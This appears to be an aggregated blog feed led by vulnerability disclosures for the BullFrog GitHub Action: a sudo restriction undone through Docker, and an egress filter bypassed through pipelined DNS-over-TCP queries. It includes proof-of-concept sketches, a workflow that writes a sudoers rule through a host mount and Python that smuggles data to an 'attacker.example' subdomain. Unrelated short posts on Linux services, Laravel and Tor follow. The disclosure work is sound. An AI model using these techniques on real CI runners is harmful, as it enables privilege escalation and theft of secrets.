It does not restrict Docker access, does not drop the runner from the docker group, and does not prevent privileged container execution. Because Docker daemon access is equivalent to root access on the host, the sudo restriction can be fully reversed in a single command: no password, no escalation, no interaction required. The bypass drops a sudoers rule back into place by writing through the container's view of the host filesystem. After this, sudo succeeds again and the runner has full root access for the rest of the job. A proof-of-concept workflow demonstrates the full bypass: disable sudo with BullFrog, confirm it's gone, restore it via Docker, confirm it's back. The workflow output confirms the sequence cleanly: BullFrog disables sudo, the verification step passes, Docker writes the sudoers rule, and the final step confirms full sudo access is back, all within the same job, all as the unprivileged user, with no external dependencies beyond the Docker image. Reported to the BullFrog team on November 28th, 2025. No response, acknowledgment, or fix was issued in the roughly three months that followed, so I am disclosing publicly now. This is the second BullFrog vulnerability I'm disclosing simultaneously due to the same lack of response (see also: Bypassing egress filtering in BullFrog GitHub Action ). Affected Versions : v0.8.4 and likely all prior versions Fixed Versions : None as of disclosure date (I did not bother to check) Disclosure Timeline Discovery & Report : 28th November 2025 Vendor Contact : 28th November 2025 Vendor Response : None Public Disclosure : 28th February 2026
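The bypass described above can be sketched as a workflow fragment. This is a hedged reconstruction, not the post's actual PoC: the BullFrog action reference and its option names are assumptions, and the sudoers path and rule are illustrative. The crux is only the `docker run` line, where a host mount lets an unprivileged user write root-owned files.

```yaml
# Sketch only: action ref and option names are hypothetical.
steps:
  - uses: bullfrogsec/bullfrog@v0   # hypothetical ref; the sudo-disabling
    with:                           # option discussed in the post goes here
      egress-policy: block

  - name: Confirm sudo is gone
    run: sudo -n true && exit 1 || echo "sudo disabled"

  - name: Restore sudo via the docker group (no sudo needed)
    run: |
      docker run --rm -v /:/host alpine sh -c \
        'echo "runner ALL=(ALL) NOPASSWD:ALL" > /host/etc/sudoers.d/99-restore'

  - name: Confirm sudo is back
    run: sudo id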

0 views
devansh 2 weeks ago

Bypassing egress filtering in BullFrog GitHub Action

GitHub Actions runners are essentially ephemeral Linux VMs that execute your CI/CD pipelines. The fact that they can reach the internet by default has always been a quiet concern for security-conscious teams: one malicious or compromised step can silently exfiltrate secrets, environment variables, or runner metadata out to an attacker-controlled server. A handful of tools have been built to address exactly this problem. One of them is BullFrog, a lightweight egress-filtering agent for GitHub Actions that promises to block outbound network traffic to domains outside your allowlist. The idea is elegant: drop everything except what you explicitly trust. So naturally, I poked at it. BullFrog is an open-source GitHub Actions security tool that intercepts and filters outbound network traffic from your CI runners. You drop it into your workflow as a step, hand it an allowlist and an egress policy, and it uses a userspace agent to enforce that policy on every outbound packet. After the setup step, any connection to a domain not on the allowlist should be blocked. The idea is solid. Supply chain attacks, secret exfiltration, dependency confusion: all of these require outbound connectivity. Cutting that off at the network layer is a genuinely good defensive primitive. The BullFrog agent intercepts outbound packets using netfilter queue (NFQUEUE). When a DNS query packet is intercepted, the agent inspects the queried domain against the allowlist. If the domain matches, the packet goes through. If it doesn't, it is dropped. For DNS over UDP, this is fairly straightforward: one UDP datagram, one DNS message. But DNS also runs over TCP, and TCP is where things get interesting. DNS-over-TCP is used when a DNS response exceeds 512 bytes (common with DNSSEC, large records, etc.), or when a client explicitly prefers TCP for reliability. RFC 1035 specifies that DNS messages over TCP are prefixed with a 2-byte length field to delimit individual messages.
Crucially, the same TCP connection can carry multiple DNS messages back-to-back; this is called DNS pipelining (RFC 7766). This is the exact footgun BullFrog stepped on. BullFrog's DNS-handling function parses the incoming TCP payload, extracts the first DNS message using the 2-byte length prefix, checks it against the allowlist, and returns. It never looks at the rest of the TCP payload. If there are additional DNS messages pipelined in the same TCP segment, they are completely ignored. The consequence: if the first message queries an allowed domain, the entire packet is accepted, including any subsequent messages querying blocked domains. Those blocked queries sail right through to the upstream DNS server. The smoking gun is at agent/agent.go#L403 : the function slices out the first length-prefixed message, decodes that single DNS message, runs the policy check on it, and returns its verdict. Any bytes after it, which may contain one or more additional DNS messages, are never touched. It's a classic "check the first item, trust the rest" mistake. The guard is real, but it only covers the front door. The first query acts as camouflage. The second is the actual payload: it can encode arbitrary data in the subdomain (hostname, runner name, env vars, secrets) and have it resolved by a DNS server the attacker controls. They observe the DNS lookup on their end and retrieve the exfiltrated data: no HTTP, no direct socket to a C2, no obvious telltale traffic pattern. To reproduce this, the PoC script builds two raw DNS queries, wraps each with a TCP 2-byte length prefix per RFC 1035, concatenates them into a single payload, and sends it over one TCP connection to the upstream resolver. Runner metadata (OS, kernel release, hostname, runner name) is embedded in the exfiltration domain.
Running this against a real workflow with BullFrog configured to allow only a single benign domain, the runner's OS, kernel version, hostname, and an environment variable were successfully observed in Burp Collaborator's DNS logs, proving that the second DNS query bypassed the policy entirely. I reported this to the BullFrog team on November 28th, 2025 via their GitHub repository. After roughly three months with no response, acknowledgment, or patch, I'm disclosing this publicly. The vulnerability is straightforward to exploit and affects any workflow using BullFrog where DNS is routed over TCP, which Google's public DNS supports natively. Affected Versions : v0.8.4 and likely all prior versions Fixed Versions : None as of disclosure date (did not bother to check) Disclosure Timeline Discovery & Report : 28th November 2025 Vendor Contact : 28th November 2025 Vendor Response : None Public Disclosure : 28th February 2026
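The pipelining trick is easy to reproduce offline. Below is a minimal sketch (not the author's PoC script; the domains are placeholders) that builds two length-prefixed DNS queries, concatenates them into one TCP payload per RFC 7766, and shows why a filter that decodes only the first length-prefixed message never sees the second:

```python
import struct

def build_query(domain: str) -> bytes:
    """Build a minimal DNS query message: 12-byte header + one A-record question."""
    # ID=0x1234, flags=0x0100 (recursion desired), QDCOUNT=1
    header = struct.pack(">HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode()
                     for label in domain.split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN

def tcp_frame(msg: bytes) -> bytes:
    """RFC 1035: DNS over TCP prefixes each message with a 2-byte length."""
    return struct.pack(">H", len(msg)) + msg

# Pipeline two queries in one TCP payload (RFC 7766): the first for an
# allowed domain, the second smuggling data in an attacker-observed subdomain.
allowed = tcp_frame(build_query("example.com"))
smuggled = tcp_frame(build_query("host1.data.attacker.example"))
payload = allowed + smuggled

# A filter that, like the code described above, checks only the first
# length-prefixed message never inspects the smuggled query:
first_len = struct.unpack(">H", payload[:2])[0]
checked = payload[2:2 + first_len]    # all the filter ever decodes
unchecked = payload[2 + first_len:]   # sails through unexamined
assert unchecked == smuggled
```

Sending `payload` over a single TCP connection to a pipelining-capable resolver (e.g. via `socket.create_connection((resolver_ip, 53))` followed by `sendall(payload)`) delivers both queries upstream.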

0 views
Rik Huijzer 2 weeks ago

How To Run Services on a Linux Server

I have been running services myself for a few years on Linux servers. It took a while to figure out what works best. Here's what I've learned. First of all, all maintenance is done on headless servers via SSH. Learning this might seem daunting for some at first, but it is truly unbeatable in terms of productivity and speed. To easily log in via SSH, add the SSH keys to the server and then add the server to your `~/.ssh/config`. For example,

```
Host arnold
    Hostname 123.456.789.012
    User rik
    IdentityFile ~/.ssh/arnold
```

Now you can log in via `ssh arnold` instead of having to ma...

0 views
Rik Huijzer 2 weeks ago

Setup a Syncthing service on Debian

Install via the APT instructions. Next (source):

```
useradd -u 1010 -c "Syncthing Service" -d /var/syncthing -s /usr/sbin/nologin syncthing
mkdir /var/syncthing
chown -R syncthing:syncthing /var/syncthing
chmod 700 /var/syncthing
systemctl enable syncthing@syncthing.service
systemctl start syncthing@syncthing.service
systemctl status syncthing@syncthing.service
```

Then you should be able to connect to the web GUI at `localhost:8385`. To allow this user to read files outside its own directories, use

```
getfacl /some/other/dir
```

from `acl` (`apt-get install acl`) to view the permission...

0 views

Fixing qBittorrent in Docker, swallowing RAM and locking up the host

I’ve had qBittorrent running happily in Docker for over a year now, using the linuxserver/qbittorrent image. I run the docker container and others on an Ubuntu Server host. Recently, the host regularly becomes unresponsive. SSH doesn’t work, and the only way to recover is to power cycle the server (running on a small NUC). The symptoms were: RAM usage would climb and climb, the server would become sluggish, and then it would completely lock up.

0 views
W. Jason Gilmore 2 weeks ago

Testing a Laravel MCP Server Using Herd and Claude Desktop

I recently added an MCP server to ContributorIQ , using Laravel's native MCP server integration. Creating the MCP server with Claude Code was trivial; however, testing it with the MCP Inspector and Claude Desktop was not, because of an SSL issue related to Laravel Herd. If you arrived at this page I suppose it is because you already know what all of these terms mean, so I'm not going to waste your time by explaining. The issue you're probably facing is that MCP clients look for a valid SSL certificate if https is used to define the MCP server endpoint. The fix involves setting an environment variable that relaxes certificate verification. If you want to test your MCP server using the official MCP Inspector, you can set this environment variable right before running the inspector. If you'd like to test the MCP server inside Claude Desktop (which is what your end users will probably do), then you'll need to set this environment variable inside Claude Desktop's configuration. I also faced Node version issues, but I suspect that's due to an annoying local environment quirk; I'll include that code in the snippet just in case it's helpful. Hope this helps.

0 views
Martin Fowler 2 weeks ago

Fragments: February 23

Do you want to run OpenClaw? It may be fascinating, but it also raises significant security dangers. Jim Gumbley, one of my go-to sources on security, has some advice on how to mitigate the risks. While there is no proven safe way to run high-permissioned agents today, there are practical patterns that reduce the blast radius. If you want to experiment, you have options, such as cloud VMs or local micro-VM tools like Gondolin. He outlines a series of steps to consider. ❄                ❄                ❄                ❄                ❄ Caer Sanders shares impressions from the Pragmatic Summit . From what I’ve seen working with AI organizations of all shapes and sizes, the biggest indicator of dysfunction is a lack of observability. Teams that don’t measure and validate the inputs and outputs of their systems are at the greatest risk of having more incidents when AI enters the picture. I’ve long felt that people underestimated the value of QA in production . Now that we’re in a world of non-deterministic construction, a modern perspective on observability will be even more important. Caer finishes by drawing a parallel with their experience in robotics: If I calculate the load requirements for a robot’s chassis, 3D model it, and then have it 3D-printed, did I build a robot? Or did the 3D printer build the robot? Most people I ask seem to think I still built the robot, and not the 3D printer. … Now, if I craft the intent and design for a system, but AI generates the code to glue it all together, have I created a system? Or did the AI create it? ❄                ❄                ❄                ❄                ❄ Andrej Karpathy is “very interested in what the coming era of highly bespoke software might look like.” He spent half an hour vibe coding an individualized dashboard for cardio experiments from a specific treadmill. The “app store” of a set of discrete apps that you choose from is an increasingly outdated concept all by itself.
The future is services of AI-native sensors & actuators orchestrated via LLM glue into highly custom, ephemeral apps. It’s just not here yet. ❄                ❄                ❄                ❄                ❄ I’ve been asked a few times about the role LLMs should play in writing. I’m mulling on a more considered article about how they help and hinder. For now I’ll say two central points are those that apply to writing with or without them. First, acknowledge anyone who has significantly helped with your piece. If an LLM has given material help, mention how in the acknowledgments. Not only is this transparent, it also provides information to readers on the potential value of LLMs. Secondly, know your audience. If you know your readers will likely be annoyed by the uncanny valley of LLM prose, then don’t let it generate your text. But if you’re writing a mandated report that you suspect nobody will ever read, then have at it. (I hardly use LLMs for writing, but doubtless I have an inflated opinion of my ability.) ❄                ❄                ❄                ❄                ❄ In a discussion of using specifications as a replacement for code while working with LLMs, a colleague posted the following quotation: “What a useful thing a pocket-map is!” I remarked. “That’s another thing we’ve learned from your Nation,” said Mein Herr, “map-making. But we’ve carried it much further than you. What do you consider the largest map that would be really useful?” “About six inches to the mile.” “Only six inches!” exclaimed Mein Herr. “We very soon got to six yards to the mile. Then we tried a hundred yards to the mile. And then came the grandest idea of all! We actually made a map of the country, on the scale of a mile to the mile!” “Have you used it much?” I enquired. “It has never been spread out, yet,” said Mein Herr: “the farmers objected: they said it would cover the whole country, and shut out the sunlight!
So we now use the country itself, as its own map, and I assure you it does nearly as well.” from Lewis Carroll, Sylvie and Bruno Concluded, Chapter XI, London, 1893, acquired from a Wikipedia article about a Jorge Luis Borges short story. ❄                ❄                ❄                ❄                ❄ Grady Booch: Human language needs a new pronoun, something whereby an AI may identify itself to its users. When, in conversation, a chatbot says to me “I did this thing”, I - the human - am always bothered by the presumption of its self-anthropomorphization. ❄                ❄                ❄                ❄                ❄ My dear friends in Britain and Europe will not come and visit us in Massachusetts. Some folks may think they are being paranoid, but this story makes their caution understandable. The dream holiday ended abruptly on Friday 26 September, as Karen and Bill were trying to leave the US. When they crossed the border, Canadian officials told them they didn’t have the correct paperwork to bring the car with them. They were turned back to Montana on the American side – and to US border control officials. Bill’s US visa had expired; Karen’s had not. “I worried then,” she says. “I was worried for him. I thought, well, at least I am here to support him.” She didn’t know it at the time, but it was the beginning of an ordeal that would see Karen handcuffed, shackled and sleeping on the floor of a locked cell, before being driven for 12 hours through the night to an Immigration and Customs Enforcement (ICE) detention centre. Karen was incarcerated for a total of six weeks – even though she had been travelling with a valid visa. Jim Gumbley’s steps to consider, from the first fragment: Prioritize isolation first. Clamp down on network egress. Don’t expose the control plane. Treat secrets as toxic waste. Assume the skills ecosystem is hostile. Run endpoint protection.

0 views
neilzone 2 weeks ago

decoded.legal's .onion site no longer has TLS / https

tl;dr: As of 2026-02-23, http://dlegal66uj5u2dvcbrev7vv6fjtwnd4moqu7j6jnd42rmbypv3coigyd.onion no longer offers TLS. It just has Tor’s own transport encryption. I have run .onion sites for a long time. I like the idea of people being able to access resources within the Tor network, without needing to access the clearweb. These .onion services benefit from Tor’s transport encryption. For the last four years, the decoded.legal onion site ( http://dlegal66uj5u2dvcbrev7vv6fjtwnd4moqu7j6jnd42rmbypv3coigyd.onion ) also had a “normal” TLS certificate. Setting this up was relatively straightforward . However, renewing it is a manual operation and a bit of a faff, which suggests that I am spoiled by Let’s Encrypt. When the certificate came up for renewal this year, I decided to remove it. Why? Because I’m just not persuaded that the incremental benefits of having TLS over Tor justify the faff, or the (low) cost. The site still has Tor’s transport encryption. And, if I’m wrong, and I get loads of complaints (of which I am not really expecting a single one), I can also put it back. I did it this way: A few weeks ago, I turned off auto-redirection within my apache2 configuration, so that requests to the http onion site would no longer redirect automatically to the https onion site. I also changed the relevant headers, sent when someone visits the clearweb site ( https://decoded.legal ), in favour of the http, rather than https, URL for the .onion site. In my torrc, I commented out the line which I had put in place for port 443, and restarted Tor. For apache2, I removed the symlink for the https config file from sites-enabled, and restarted apache2.
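The Tor-side change described above amounts to something like this torrc fragment. The directory path is an assumption; the point is that the port 443 mapping is the line commented out, leaving only plain HTTP carried over Tor's own encryption:

```
# Illustrative torrc fragment (HiddenServiceDir path assumed):
HiddenServiceDir /var/lib/tor/decoded_legal/
HiddenServicePort 80 127.0.0.1:80
# HiddenServicePort 443 127.0.0.1:443   # removed: no more TLS on the onion
```

After editing, restarting the tor service makes the hidden service stop listening on 443.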

0 views